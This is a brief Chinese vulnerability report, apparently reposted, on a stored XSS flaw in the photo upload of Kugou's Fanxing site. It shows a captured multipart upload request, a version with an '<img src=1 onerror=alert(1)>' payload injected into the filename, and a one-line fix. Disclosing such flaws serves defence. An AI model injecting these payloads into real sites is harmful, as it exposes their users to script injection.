这个 漏洞 在酷狗旗下的繁星网:
fanxing.kugou.com
情景再现:
情况分析:
繁星网相册处因为对上传的文件名没有做很好的过滤,我们只要开启抓包软件
看到提交的数据是:
-----------------------------234891716625512\r\nContent-Disposition: form-data; name="photo"; filename="aaaaaaaaa.jpg"\r\nContent-Type: image/jpeg\r\n\r\nÿØÿà
在提交的文件名内插入XSS代码,那我们提交的数据就应该是:
-----------------------------234891716625512\r\nContent-Disposition: form-data; name="photo"; filename="aaaaaaaaa<img src=1 onerror=alert(1)>.jpg"\r\nContent-Type: image/jpeg\r\n\r\nÿØÿà
上传成功以后就可以进行XSS跨站攻击了!
修复方案: 对文件名进行过滤
查看更多关于酷狗旗下分站持久型XSS跨站攻击 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14964